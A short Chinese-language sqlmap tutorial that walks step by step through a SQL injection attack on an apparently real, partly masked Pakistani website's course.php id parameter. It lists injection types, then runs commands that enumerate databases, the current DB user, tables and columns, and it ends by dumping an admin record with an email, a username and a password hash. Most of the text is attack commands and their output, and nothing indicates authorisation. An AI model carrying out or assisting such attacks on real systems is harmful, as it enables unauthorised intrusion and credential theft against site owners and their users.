使用sqlmap进行试验：

<a href="</a>

sqlmap.py -u http://www.xxxx/course.php?id=16

//sqlmap -V 1.0.11,会生成相关文件，包含payload以及注入类型

参数介绍：

Parameter: id (GET)，注入参数为GET注入：

注入类型有：

boolean-based blind       //基于布尔的盲注，也就是可以根据返回页面判断条件真假的注入
error-based   //报错型注入
time-based blind  //基于时间延迟注入
UNION query     //可联合查询注入

此外还有一种为：
stacked queries SQL injection //可多语句查询注入

the back-end DBMS is MySQL，back-end DBMS: MySQL >= 5.0使用数据库为MYSQL，版本为5.x
web application technology: PHP 5.3.29//Web应用程序技术

2.得到数据库：
sqlmap.py -u http://www.xxx.org.pk/course.php?id=16 --dbs
[]efnypvon_icd_db
[]information_schema

3.web当前使用的数据库
sqlmap.py -u http://www.xxxx/course.php?id=16 --current-db

current database:    'efnypvon_icd_db'

4.web数据库所使用的账户
sqlmap.py -u http://www.xxx.pk/course.php?id=16 --current-user

current user:    'efnypvon_icd_usr@localhost'

5.具体查看某一数据库：
sqlmap.py -u http://www.xxx.pk/course.php?id=16 -D efnypvon_icd_db --tables

6.查看表的字段
sqlmap.py -u http://www.xxx.pk/course.php?id=16 -D efnypvon_icd_db -T icd_tbl_admin --columns

7.得到字段内容：

sqlmap.py -u http://www.xxx.pk/course.php?id=16 -D efnypvon_icd_db -T icd_tbl_admin "fEmail,fPassword,fUserName,last_admiin,superadmin" --dump

info@xxxx.pk
icdmaster
223880689d78a4d2c2e84607f13715ee
2016-11-30 09:15:28

thats all :D